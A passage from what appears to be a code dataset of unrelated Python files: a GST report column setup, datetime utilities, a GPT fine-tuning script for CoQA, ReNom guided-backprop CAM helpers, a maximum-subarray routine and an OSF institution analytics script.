\"document_type\",\n\t\t\t\t\t\"label\": \"Document Type\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 80\n\t\t\t\t}\n\t\t\t]\n\t\telif self.filters.get(\"type_of_business\") == \"B2C Small\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"place_of_supply\",\n\t\t\t\t\t\"label\": \"Place of Supply\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"ecommerce_gstin\",\n\t\t\t\t\t\"label\": \"E-Commerce GSTIN\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 130\n\t\t\t\t}\n\t\t\t]\n\t\t\tself.other_columns = [\n\t\t\t\t{\n\t\t\t\t\t\t\"fieldname\": \"cess_amount\",\n\t\t\t\t\t\t\"label\": \"Cess Amount\",\n\t\t\t\t\t\t\"fieldtype\": 
\"Currency\",\n\t\t\t\t\t\t\"width\": 100\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"type\",\n\t\t\t\t\t\"label\": \"Type\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 50\n\t\t\t\t}\n\t\t\t]\n\t\telif self.filters.get(\"type_of_business\") == \"EXPORT\":\n\t\t\tself.invoice_columns = [\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"export_type\",\n\t\t\t\t\t\"label\": \"Export Type\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\":120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_number\",\n\t\t\t\t\t\"label\": \"Invoice Number\",\n\t\t\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\t\t\"options\": \"Sales Invoice\",\n\t\t\t\t\t\"width\":120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"posting_date\",\n\t\t\t\t\t\"label\": \"Invoice date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"invoice_value\",\n\t\t\t\t\t\"label\": \"Invoice Value\",\n\t\t\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"port_code\",\n\t\t\t\t\t\"label\": \"Port Code\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"shipping_bill_number\",\n\t\t\t\t\t\"label\": \"Shipping Bill Number\",\n\t\t\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\t\"fieldname\": \"shipping_bill_date\",\n\t\t\t\t\t\"label\": \"Shipping Bill Date\",\n\t\t\t\t\t\"fieldtype\": \"Date\",\n\t\t\t\t\t\"width\": 120\n\t\t\t\t}\n\t\t\t]\n\t\tself.columns = self.invoice_columns + self.tax_columns + self.other_columns","sub_path":"finance/finance/report/spm_gstr_1/spm_gstr_1.py","file_name":"spm_gstr_1.py","file_ext":"py","file_size_in_byte":14229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"71708269","text":"# -*- coding: utf-8 -*-\n# Copyright 2021 Tampere University and VTT Technical Research Centre of Finland\n# This software was developed as a part of the ProCemPlus project: https://www.senecc.fi/projects/procemplus\n# This source code is licensed under the MIT license. 
See LICENSE in the repository root directory.\n# Author(s): Ville Heikkilä \n\n\"\"\"Module containing utility functions related to datetime values.\"\"\"\n\nimport datetime\nfrom typing import Union\n\nfrom tools.tools import FullLogger\n\nLOGGER = FullLogger(__name__)\n\nUTC_TIMEZONE_MARK = \"Z\"\nDIGITS_IN_MILLISECONDS = 3\n\n\ndef get_utcnow_in_milliseconds() -> str:\n \"\"\"Returns the current ISO 8601 format datetime string in UTC timezone.\"\"\"\n isoformat_with_milliseconds = isoformat_to_milliseconds(datetime.datetime.utcnow().isoformat())\n if isoformat_with_milliseconds is None:\n LOGGER.error(\"Unexpected error when trying to get current time in ISO 8601 format\")\n return \"1970-01-01T00:00:00.000Z\"\n\n return isoformat_with_milliseconds + UTC_TIMEZONE_MARK\n\n\ndef to_iso_format_datetime_string(datetime_value: Union[str, datetime.datetime]) -> Union[str, None]:\n \"\"\"Returns the given datetime value as ISO 8601 formatted string in UTC timezone.\n Accepts either datetime objects or strings.\n Return None if the given values was invalid.\"\"\"\n if isinstance(datetime_value, datetime.datetime):\n isoformat_with_milliseconds = isoformat_to_milliseconds(\n datetime_value.astimezone(datetime.timezone.utc).isoformat())\n if isoformat_with_milliseconds is None:\n return None\n return isoformat_with_milliseconds + UTC_TIMEZONE_MARK\n if isinstance(datetime_value, str):\n datetime_object = to_utc_datetime_object(datetime_value)\n return to_iso_format_datetime_string(datetime_object)\n return None\n\n\ndef to_utc_datetime_object(datetime_str: str) -> datetime.datetime:\n \"\"\"Returns a datetime object corresponding to the given ISO 8601 formatted string.\"\"\"\n return datetime.datetime.fromisoformat(datetime_str.replace(UTC_TIMEZONE_MARK, \"+00:00\"))\n\n\ndef isoformat_to_milliseconds(datetime_str: str) -> Union[str, None]:\n \"\"\"Returns the given ISO 8601 format datetime string in millisecond precision.\n Also removes timezone information.\"\"\"\n date_mark_index = datetime_str.find(\"T\")\n if date_mark_index < 0:\n return None\n\n plus_mark_index = datetime_str.find(\"+\", date_mark_index)\n if plus_mark_index >= 0:\n datetime_str = datetime_str[:plus_mark_index]\n\n minus_mark_index = datetime_str.find(\"-\", date_mark_index)\n if minus_mark_index >= 0:\n datetime_str = datetime_str[:minus_mark_index]\n\n second_fraction_mark_index = datetime_str.find(\".\")\n if second_fraction_mark_index >= 0:\n number_of_decimals = len(datetime_str) - second_fraction_mark_index\n return (\n datetime_str[:second_fraction_mark_index + DIGITS_IN_MILLISECONDS + 1] +\n \"0\" * max(DIGITS_IN_MILLISECONDS - number_of_decimals, 0)\n )\n\n return datetime_str + \".\" + \"0\" * DIGITS_IN_MILLISECONDS\n","sub_path":"domain-messages/simulation-tools/tools/datetime_tools.py","file_name":"datetime_tools.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"358163778","text":"import argparse\r\n\r\nfrom torch.utils.data import DataLoader\r\nimport sys\r\n\r\nimport clr as net_clr\r\nfrom System import Array, IntPtr, Int32, Int64\r\nfrom progress.bar import Bar as Bar\r\nimport os\r\nimport torch\r\nimport encoder\r\n\r\nimport random\r\nimport json\r\nimport numpy\r\nimport collections\r\nfrom collections import Counter\r\nfrom collections import OrderedDict\r\nimport math\r\n\r\nparser = argparse.ArgumentParser(description='CoQA machine reading comprehension training 
...')\r\n\r\nparser.add_argument('--lib', default='Targets/', type=str, help='biglearn lib path')\r\nparser.add_argument('--vocab_file', default='/gpt-2/models/345M/', type=str, help='vocabulary file')\r\nparser.add_argument(\"--pad_token\", type=int, default=50256, help=\"id of [pad]\")\r\nparser.add_argument(\"--vocabsize\", type=int, default=50257, help=\"vocab size.\")\r\n\r\nparser.add_argument('--output_dir', default='/tmp_coqa/', type=str, help='output model')\r\n\r\nparser.add_argument('--init_checkpoint', default='/gpt-2/models/345M/', type=str, help='output model')\r\n\r\nparser.add_argument('--train_file', default='/coqa/coqa-train-v1.0.json', type=str, help='CoQA json for training. E.g., train-v1.1.json')\r\nparser.add_argument('--predict_file', default='/coqa/coqa-dev-v1.0.json', type=str, help='CoQA json for dev. E.g., dev-v1.1.json')\r\n\r\nparser.add_argument(\"--max_seq_length\", type=int, default=514, help=\"maximum sequence length\")\r\nparser.add_argument(\"--max_query_length\", type=int, default=64, help=\"maximum query length\")\r\nparser.add_argument(\"--max_ans_length\", type=int, default=32, help=\"maximum ans length\")\r\n\r\nparser.add_argument(\"--batch_size\", type=int, default=48, help=\"number of batch_size\")\r\nparser.add_argument(\"--num_workers\", type=int, default=0, help=\"dataloader worker size\")\r\nparser.add_argument(\"--gpu_id\", type=str, default=\"0\", help=\"gpu id\")\r\nparser.add_argument(\"--grad_acc\", type=int, default=1, help=\"gradient accumulate step.\")\r\n\r\nparser.add_argument(\"--learning_rate\", type=float, default=1.5e-5, help=\"The initial learning rate for Adam.\")\r\nparser.add_argument(\"--num_train_epochs\", type=float, default=2.0, help=\"Total number of training epochs to perform.\")\r\nparser.add_argument(\"--grad_clip\", type=float, default=1.0, help=\"gradient clip\")\r\nparser.add_argument(\"--warmup_proportion\", type=float, default=0.06, help=\"Proportion of training to perform linear learning rate warmup for. 
\")\r\nparser.add_argument(\"--save_checkpoints_steps\", type=int, default=1000, help=\"How often to save the model checkpoint.\")\r\nparser.add_argument('--weight_decay', type=float, default=0.0001, help='weight decay for optimization.')\r\n\r\nparser.add_argument(\"--beam_size\", type=int, default=1, help=\"beam search for prediction.\")\r\n\r\nparser.add_argument(\"--mode\", type=int, default=1, help=\"0:train; 1:mrc prediction; 2:query generation;\")\r\nparser.add_argument('--seed_type', default=0, type=int, metavar='S', help='0:originial gpt; 1: refined gpt.')\r\n\r\n\r\nargs = parser.parse_args()\r\n#args.vocab_path = args.seed_gpt\r\n\r\n#train_dataset = args.train_dataset\r\n#valid_dataset = ''\r\n#valid_json = ''\r\n\r\n#if not args.input == '':\r\n#train_dataset = args.input + '/train-v2.0.roberta.cook.json'\r\n# valid_dataset = args.input + '/dev-v2.0.roberta.cook.json'\r\n# valid_json = args.input + '/dev-v2.0.json' \r\n\r\nsys.path.append(args.lib) \r\nnet_clr.AddReference('BigLearn')\r\nnet_clr.AddReference('BigLearn.DeepNet')\r\n\r\n#cate = 2\r\n#unk_cate = 1\r\n\r\nfrom gpt_model import DistGPTTrainer, DistGPTPredictor\r\nfrom coqa_dataset import seq2seq_dataset, CoQAExample, read_coqa_examples, InputFeatures, convert_examples_to_features, write_predictions\r\n\r\n#from util import AverageMeter, Schedule, WorkStation\r\n#from util import SpanLogit, GetBestSpan, GetBestSpanLogProb\r\n#from squad_eval_v2 import call_validate\r\n\r\nimport BigLearn\r\nfrom BigLearn import GradientOptimizer, StructureLearner\r\n\r\n\r\ndevice_num = len(args.gpu_id.split(','))\r\nprint(\"set gpu number \", device_num)\r\nos.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu_id)\r\n\r\n\r\nclass AverageMeter(object):\r\n \"\"\"Computes and stores the average and current value\r\n \"\"\"\r\n def __init__(self, tmpfile=''):\r\n self.reset()\r\n \r\n if tmpfile == '':\r\n self.tmpwriter = None\r\n else:\r\n self.tmpwriter = open(tmpfile, 'w')\r\n\r\n def done(self):\r\n if tmpwriter != None:\r\n self.tmpwriter.close()\r\n\r\n def reset(self):\r\n self.val = 0\r\n self.avg = 0\r\n self.sum = 0\r\n self.count = 0\r\n self.history = []\r\n\r\n def update(self, val, n=1):\r\n self.val = val\r\n self.sum += val * n\r\n self.count += n\r\n self.avg = self.sum / self.count\r\n\r\n for k in range(n):\r\n self.history.append(val)\r\n\r\n if self.tmpwriter != None:\r\n self.tmpwriter.write(str(val)+'\\n')\r\n self.tmpwriter.flush()\r\n\r\n\r\ndef predict_mrc(pred_loader, tokenizer, gptPredictor):\r\n all_results = []\r\n\r\n bar = Bar('prediction', max=len(pred_loader))\r\n gptPredictor.init()\r\n\r\n for batch_idx, data in enumerate(pred_loader):\r\n data = {key: value for key, value in data.items()}\r\n\r\n q_tokens = data['src_tokens']\r\n q_len = data['src_len']\r\n\r\n a_tokens = data['tgt_tokens']\r\n a_len = data['tgt_len']\r\n\r\n unique_id = data['unique_id']\r\n\r\n #_tokens = data['token']\r\n #_lens = data['len']\r\n _ans_tokens, _ans_len = gptPredictor.predict(q_tokens, q_len) \r\n\r\n for b in range(0, args.batch_size):\r\n _unique_id = unique_id[b].item()\r\n _ans_text = tokenizer.decode(_ans_tokens[b][:_ans_len[b]].numpy())\r\n all_results.append([_unique_id, _ans_text])\r\n\r\n bar.suffix = '({batch}/{size}) Total: {total:} | ETA: {eta:} '.format(\r\n batch=batch_idx + 1,\r\n size=len(pred_loader),\r\n total=bar.elapsed_td,\r\n eta=bar.eta_td)\r\n bar.next()\r\n gptPredictor.complete()\r\n bar.finish()\r\n return all_results\r\n\r\ndef train(task_loaders, num_train_steps, gptTrainer):\r\n 
#train_iter = iter(train_loader) \r\n epoch = 0\r\n update_cnt = 0\r\n bar = Bar('training', max=num_train_steps * args.grad_acc)\r\n\r\n rng = random.Random(9110)\r\n task_iter = {}\r\n\r\n dq_loss = AverageMeter()\r\n da_loss = AverageMeter()\r\n gptTrainer.init()\r\n for train_step in range(num_train_steps * args.grad_acc):\r\n\r\n task_idx = random.randint(0, len(task_loaders) - 1)\r\n task_loader = task_loaders[task_idx]\r\n try:\r\n data = next(task_iter[task_loader])\r\n except:\r\n task_iter[task_loader] = iter(task_loader)\r\n data = next(task_iter[task_loader])\r\n data = {key: value for key, value in data.items()}\r\n\r\n src_tokens = data['src_tokens']\r\n src_len = data['src_len']\r\n\r\n tgt_tokens = data['tgt_tokens']\r\n tgt_len = data['tgt_len']\r\n\r\n is_update = False\r\n if (train_step + 1) % args.grad_acc == 0:\r\n is_update = True\r\n update_cnt += 1\r\n\r\n # full_train(self, q_tokens, q_len, a_tokens, a_len, is_update=True, ratio = 1.0):\r\n _loss = gptTrainer.full_train(src_tokens, src_len, tgt_tokens, tgt_len, is_update=is_update, ratio = 1.0 / args.grad_acc / device_num)\r\n\r\n if task_idx == 0:\r\n dq_loss.update(_loss)\r\n elif task_idx == 1:\r\n da_loss.update(_loss)\r\n\r\n if is_update and update_cnt % args.save_checkpoints_steps == 0 : \r\n gptTrainer.save_model(args.output_dir + '/model.'+str(update_cnt)+'.epoch')\r\n\r\n bar.suffix = '({batch}/{size}) Total: {total:} | ETA: {eta:} | dq_loss: {dq_loss.val:.3f} ({dq_loss.avg:.3f}) | da_loss: {da_loss.val:.3f} ({da_loss.avg:.3f})'.format(\r\n batch=train_step,\r\n size=num_train_steps * args.grad_acc,\r\n total=bar.elapsed_td,\r\n eta=bar.eta_td,\r\n dq_loss=dq_loss,\r\n da_loss=da_loss)\r\n bar.next()\r\n bar.finish()\r\n \r\n gptTrainer.save_model(args.output_dir + '/model.done.epoch')\r\n gptTrainer.complete()\r\n\r\n\r\n\r\ndef lr_schedule(init_lr, num_train_steps, num_warmup_steps):\r\n lr_sched = '0:0.0,'+str(num_warmup_steps)+':'+str(init_lr)+','+str(num_train_steps)+':0.0'\r\n print(lr_sched)\r\n return lr_sched\r\n\r\ndef main():\r\n tokenizer = encoder.get_encoder('', args.vocab_file)\r\n if not os.path.exists(args.output_dir):\r\n os.makedirs(args.output_dir)\r\n\r\n # training.\r\n if args.mode == 0: \r\n print('loading training data', args.train_file)\r\n train_examples = read_coqa_examples(input_file=args.train_file, tokenizer=tokenizer, history=100, turn_ids=[1])\r\n\r\n # Pre-shuffle the input to avoid having to make a very large shuffle buffer in in the `input_fn`.\r\n print('shuffling training data')\r\n rng = random.Random(12345)\r\n rng.shuffle(train_examples)\r\n \r\n dq_train_features = convert_examples_to_features(examples=train_examples,\r\n tokenizer=tokenizer,\r\n pad_token=args.pad_token,\r\n max_seq_length=args.max_seq_length,\r\n max_ans_length=args.max_ans_length,\r\n max_query_length=args.max_query_length,\r\n fea_style=0)\r\n\r\n da_train_features = convert_examples_to_features(examples=train_examples,\r\n tokenizer=tokenizer,\r\n pad_token=args.pad_token,\r\n max_seq_length=args.max_seq_length,\r\n max_ans_length=args.max_ans_length,\r\n max_query_length=args.max_query_length,\r\n fea_style=1)\r\n \r\n tmp_batch_size = int(args.batch_size / args.grad_acc)\r\n\r\n dq_train_dataset = seq2seq_dataset(dq_train_features, tmp_batch_size, True)\r\n dq_train_loader = DataLoader(dq_train_dataset, batch_size=tmp_batch_size, num_workers=0, shuffle=True, drop_last=True)\r\n\r\n da_train_dataset = seq2seq_dataset(da_train_features, tmp_batch_size, True)\r\n da_train_loader = 
DataLoader(da_train_dataset, batch_size=tmp_batch_size, num_workers=0, shuffle=True, drop_last=True)\r\n\r\n task_loaders = [dq_train_loader, da_train_loader]\r\n\r\n num_train_steps = int( (len(dq_train_features) + len(da_train_features)) / args.batch_size * args.num_train_epochs)\r\n num_warmup_steps = int(num_train_steps * args.warmup_proportion)\r\n lr_sched = lr_schedule(args.learning_rate, num_train_steps, num_warmup_steps)\r\n \r\n print(\"Create model and setup environment\")\r\n gptTrainer = DistGPTTrainer(args.vocabsize, 1024, 16, 24, 'coqa_gpt', tmp_batch_size, args.max_seq_length, 0.0, device_num)\r\n\r\n if args.seed_type == 0:\r\n gptTrainer.load_pretrained_gpt(args.init_checkpoint)\r\n elif args.seed_type == 1:\r\n gptTrainer.load_model(args.init_checkpoint)\r\n\r\n gptTrainer.allocate_optimizer(args.learning_rate, args.grad_clip, lr_sched, args.weight_decay)\r\n\r\n train(task_loaders, num_train_steps, gptTrainer)\r\n \r\n if args.mode == 1:\r\n print('loading predict data', args.predict_file)\r\n pred_examples = read_coqa_examples(input_file=args.predict_file, tokenizer=tokenizer, history=100, turn_ids=[i for i in range(100)])\r\n\r\n print('convert predict examples to features.')\r\n dq_pred_features = convert_examples_to_features(examples=pred_examples,\r\n tokenizer=tokenizer,\r\n pad_token=args.pad_token,\r\n max_seq_length=args.max_seq_length,\r\n max_ans_length=args.max_ans_length,\r\n max_query_length=args.max_query_length,\r\n fea_style=0)\r\n\r\n dq_pred_dataset = seq2seq_dataset(dq_pred_features, args.batch_size, False)\r\n dq_pred_loader = DataLoader(dq_pred_dataset, batch_size=args.batch_size, num_workers=0, shuffle=False, drop_last=True)\r\n\r\n gptMrcPredictor = DistGPTPredictor(args.vocabsize, 1024, 16, 24, 'coqa_gpt', args.batch_size, args.beam_size, \r\n args.max_seq_length - args.max_ans_length, args.max_ans_length, device_num)\r\n if args.seed_type == 0:\r\n gptMrcPredictor.load_pretrained_gpt(args.init_checkpoint)\r\n elif args.seed_type == 1:\r\n gptMrcPredictor.load_model(args.init_checkpoint)\r\n\r\n print('prediction lines', len(dq_pred_features))\r\n\r\n #mrcPredictor = mrcTrainer\r\n all_results = predict_mrc(dq_pred_loader, tokenizer, gptMrcPredictor)\r\n output_prediction_file = os.path.join(args.output_dir, \"predictions.json\")\r\n write_predictions(dq_pred_features, all_results, output_prediction_file)\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"python/gpt_finetune/dq_da_coqa_trainer.py","file_name":"dq_da_coqa_trainer.py","file_ext":"py","file_size_in_byte":13520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"520030920","text":"import renom.cuda as cu\nfrom renom.debug_graph import showmark\nfrom renom.core.basic_ops import to_value\nfrom renom.core import UnaryOp, Node\nfrom renom.layers.function.parameterized import Sequential\nfrom renom.layers.activation.relu import Relu\nimport renom\nimport renom as rm\nimport numpy as np\nfrom renom.cuda import set_cuda_active\nimport sys\nsys.setrecursionlimit(5000)\nif cu.has_cuda():\n from renom.cuda.gpuvalue import get_gpu\n\n\nmodel_types = ['VGG16', 'VGG19', 'ResNet18', 'ResNet34', 'ResNet50',\n 'ResNet101', 'ResNet152', 'ResNeXt50', 'ResNeXt101', 'DenseNet121', 'Sequential']\n\n# Guided Back-propagation version of ReLU function\n\n\n@showmark\nclass relu_gb(UnaryOp):\n\n @classmethod\n def _oper_cpu(cls, arg):\n return np.maximum(arg, 0)\n\n @classmethod\n def _oper_gpu(cls, arg):\n ret = get_gpu(arg).empty_like_me()\n 
cu.curelu_foward(get_gpu(arg), ret)\n return ret\n\n def _backward_cpu(self, context, dy, **kwargs):\n if isinstance(self.attrs._arg, Node):\n dy = np.where(dy > 0, dy, 0)\n self.attrs._arg._update_diff(context, np.where(self == 0, 0, dy), **kwargs)\n\n def _backward_gpu(self, context, dy, **kwargs):\n if isinstance(self.attrs._arg, Node):\n dx = get_gpu(self.attrs._arg).empty_like_me()\n cu.curelu_backard(get_gpu(self.attrs._arg), dx)\n dy_new = get_gpu(dy).empty_like_me()\n cu.curelu_foward(get_gpu(dy), dy_new)\n self.attrs._arg._update_diff(context, dx * dy_new, **kwargs)\n\n\nclass Relu_GB:\n '''Modified Rectified Linear Unit activation function for Guided Backpropagation.\n Backward pass is modified according to reference below\n\n :math:`f(x)=max(x, 0)`\n\n Args:\n x (ndarray, Node): Input numpy array or Node instance.\n\n Example:\n >>> import renom as rm\n >>> import numpy as np\n >>> x = np.array([[1, -1]])\n array([[ 1, -1]])\n >>> rm.relu(x)\n relu([[ 1. , 0.]])\n\n >>> # instantiation\n >>> activation = rm.Relu()\n >>> activation(x)\n relu([[ 1. , 0]])\n\n '''\n\n def __call__(self, x):\n return relu_gb(x)\n\n\ndef convert_relus(model):\n if isinstance(model, Sequential):\n model_dict = model.__dict__\n for k, v in model_dict.items():\n if isinstance(v, Relu):\n model_dict[k] = Relu_GB()\n elif k == '_layers':\n for i, e in enumerate(model_dict[k]):\n if isinstance(e, Relu):\n model_dict[k][i] = Relu_GB()\n else:\n convert_relus(model_dict[k][i])\n else:\n convert_relus(model_dict[k])\n else:\n try:\n model_dict = model.__dict__\n if 'model' in model_dict.keys():\n convert_relus(model_dict['model'])\n for k, v in model_dict.items():\n if isinstance(v, Relu):\n model_dict[k] = Relu_GB()\n elif k != '_parameters':\n convert_relus(model_dict[k])\n except AttributeError: # object without a __dict__, e.g. a list or a plain layer\n if isinstance(model, list):\n for i, e in enumerate(model):\n if isinstance(e, Relu):\n model[i] = Relu_GB()\n else:\n convert_relus(e)\n elif isinstance(model, Relu):\n model = Relu_GB()\n return model\n\n\ndef vgg_cam(model, x, class_id, mode):\n x = model._model.block1(x)\n x = model._model.block2(x)\n x = model._model.block3(x)\n x = model._model.block4(x)\n final_conv = rm.Sequential(model._model.block5[:-1])(x)\n x = model._model.block5[-1](final_conv)\n x = rm.flatten(x)\n x = rm.relu(model._model.fc1(x))\n x = rm.relu(model._model.fc2(x))\n x = model._model.fc3(x)\n if mode == 'plus':\n x = rm.exp(x)\n x_c = x[:, class_id]\n return rm.sum(x_c), final_conv\n\n\ndef resnet_cam(model, x, class_id, mode):\n x = model._model.conv1(x)\n x = model._model.bn1(x)\n x = model._model.relu(x)\n x = model._model.maxpool(x)\n x = model._model.layer1(x)\n x = model._model.layer2(x)\n x = model._model.layer3(x)\n final_conv = model._model.layer4(x)\n x = rm.average_pool2d(final_conv, filter=(final_conv.shape[2], final_conv.shape[3]))\n x = model._model.flat(x)\n x = model._model.fc(x)\n if mode == 'plus':\n x = rm.exp(x)\n x_c = x[:, class_id]\n return rm.sum(x_c), final_conv\n\n\ndef densenet_cam(model, x, class_id, mode):\n i = 0\n t = model._model.base[i](x)\n i += 1\n t = rm.relu(model._model.base[i](t))\n i += 1\n t = rm.max_pool2d(t, filter=3, stride=2, padding=1)\n for j in model._model.layer_per_block[:-1]:\n for k in range(j):\n tmp = t\n t = model._model.base[i](t)\n i += 1\n t = rm.concat(tmp, t)\n t = model._model.base[i](t)\n i += 1\n for j in range(model._model.layer_per_block[-1]):\n tmp = t\n t = model._model.base[i](t)\n i += 1\n t = rm.concat(tmp, t)\n final_conv = t\n t = rm.average_pool2d(t, filter=7, stride=1)\n t = 
rm.flatten(t)\n t = model._model.fc(t)\n if mode == 'plus':\n t = rm.exp(t)\n x_c = t[:, class_id]\n return rm.sum(x_c), final_conv\n\n\ndef sequential_cam(model, x, class_id, mode, node_index):\n for i in range(len(model._layers)):\n x = model._layers[i](x)\n if i == node_index:\n final_conv = x\n if mode == 'plus':\n x = rm.exp(x)\n if x.shape[1] > 1:\n t_c = x[:, class_id]\n else:\n t_c = x\n return rm.sum(t_c), final_conv\n","sub_path":"renom_img/api/utility/visualize/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"279353378","text":"def find_max_crossing(A, low, mid, high): \r\n left_sum, right_sum = float('-inf'), float('-inf') # use negative infinity as the initial value\r\n max_left, max_right = mid, mid+1\r\n sum_i, sum_j = 0, 0\r\n for i in range(mid, low-1, -1):\r\n sum_i += A[i]\r\n if sum_i > left_sum:\r\n left_sum = sum_i\r\n max_left = i\r\n\r\n for j in range(mid+1, high+1):\r\n sum_j += A[j]\r\n if sum_j > right_sum:\r\n right_sum = sum_j\r\n max_right = j\r\n return max_left, max_right, left_sum + right_sum\r\n\r\n\r\ndef find_maximum(A, low, high):\r\n if high == low:\r\n return low, high, A[low]\r\n else:\r\n mid = (low + high)//2\r\n left_data = left_low, left_high, left_sum = find_maximum(A, low, mid)\r\n right_data = right_low, right_high, right_sum = find_maximum(A, mid+1, high)\r\n cross_data = cross_low, cross_high, cross_sum = find_max_crossing(A, low, mid, high)\r\n\r\n if left_sum >= right_sum and left_sum >= cross_sum:\r\n return left_data\r\n if right_sum >= left_sum and right_sum >= cross_sum:\r\n return right_data\r\n else:\r\n return cross_data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n A = [1, 3, -5, 4, -4, 0, 1, 9, 9]\r\n print(find_maximum(A, 0, len(A) - 1))\r\n","sub_path":"学习/算法导论/分治策略/maximum.py","file_name":"maximum.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"513017570","text":"import pytz\nimport logging\nfrom modularodm import Q\nfrom dateutil.parser import parse\nfrom datetime import datetime, timedelta\n\nfrom website.app import init_app\nfrom website.models import User, Node, Institution\nfrom scripts.analytics.base import SummaryAnalytics\n\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\nclass InstitutionSummary(SummaryAnalytics):\n\n @property\n def collection_name(self):\n return 'institution_summary'\n\n def get_institutions(self):\n institutions = Institution.find(Q('_id', 'ne', None))\n return institutions\n\n def get_events(self, date):\n super(InstitutionSummary, self).get_events(date)\n from osf.models import AbstractNode, Registration\n\n institutions = self.get_institutions()\n counts = []\n\n # Convert to a datetime at midnight for queries and the timestamp\n timestamp_datetime = datetime(date.year, date.month, date.day).replace(tzinfo=pytz.UTC)\n query_datetime = timestamp_datetime + timedelta(1)\n\n for institution in institutions:\n user_query = Q('affiliated_institutions', 'eq', institution)\n node_query = (\n Q('is_deleted', 'ne', True) &\n Q('date_created', 'lt', query_datetime)\n )\n\n project_query = node_query & Q('parent_nodes', 'eq', None)\n public_query = Q('is_public', 'eq', True)\n private_query = Q('is_public', 'eq', False)\n node_public_query = node_query & public_query\n node_private_query = node_query & 
private_query\n project_public_query = project_query & public_query\n project_private_query = project_query & private_query\n count = {\n 'institution':{\n 'id': institution._id,\n 'name': institution.name,\n },\n 'users': {\n 'total': User.find(user_query).count(),\n },\n 'nodes': {\n 'total':AbstractNode.find_by_institutions(institution, node_query).count(),\n 'public': AbstractNode.find_by_institutions(institution, node_public_query).count(),\n 'private': AbstractNode.find_by_institutions(institution, node_private_query).count(),\n },\n 'projects': {\n 'total': Node.find_by_institutions(institution, project_query).count(),\n 'public': Node.find_by_institutions(institution, project_public_query).count(),\n 'private': Node.find_by_institutions(institution, project_private_query).count(),\n },\n 'registered_nodes': {\n 'total': Registration.find_by_institutions(institution, node_query).count(),\n 'public': Registration.find_by_institutions(institution, node_public_query).count(),\n 'embargoed': Registration.find_by_institutions(institution, node_private_query).count(),\n },\n 'registered_projects': {\n 'total': Registration.find_by_institutions(institution, project_query).count(),\n 'public': Registration.find_by_institutions(institution, project_public_query).count(),\n 'embargoed': Registration.find_by_institutions(institution, project_private_query).count(),\n },\n 'keen': {\n 'timestamp': timestamp_datetime.isoformat()\n }\n }\n\n logger.info(\n '{} Nodes counted. Nodes: {}, Projects: {}, Registered Nodes: {}, Registered Projects: {}'.format(\n count['institution']['name'],\n count['nodes']['total'],\n count['projects']['total'],\n count['registered_nodes']['total'],\n count['registered_projects']['total']\n )\n )\n\n counts.append(count)\n return counts\n\n\ndef get_class():\n return InstitutionSummary\n\n\nif __name__ == '__main__':\n init_app()\n institution_summary = InstitutionSummary()\n args = institution_summary.parse_args()\n yesterday = args.yesterday\n if yesterday:\n date = (datetime.today() - timedelta(1)).date()\n else:\n date = parse(args.date).date() if args.date else None\n events = institution_summary.get_events(date)\n institution_summary.send_events(events)\n","sub_path":"scripts/analytics/institution_summary.py","file_name":"institution_summary.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"527376135","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# ------------------------------------------------------------------------------\n# \n# Author: Gabriele Girelli\n# Email: gigi.ga90@gmail.com\n# Date: 20190704\n# \n# ------------------------------------------------------------------------------\n\n# DEPENDENCIES =================================================================\n\nimport argparse\nimport numpy as np\nimport os\nimport pandas as pd\nimport sys\n\nfrom ggc.args import check_threads\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\n\n# PARAMETERS ===================================================================\n\n# Add script description\nparser = argparse.ArgumentParser( description = '''\nGenerate mean and median condition profiles, from lamina to center, starting\nfrom previously extract nuclear voxel data.\n''', formatter_class = argparse.RawDescriptionHelpFormatter)\n\n# Add mandatory arguments\nparser.add_argument('prefix', type = str, help = '''\n\tUser prefix (usually in the format 
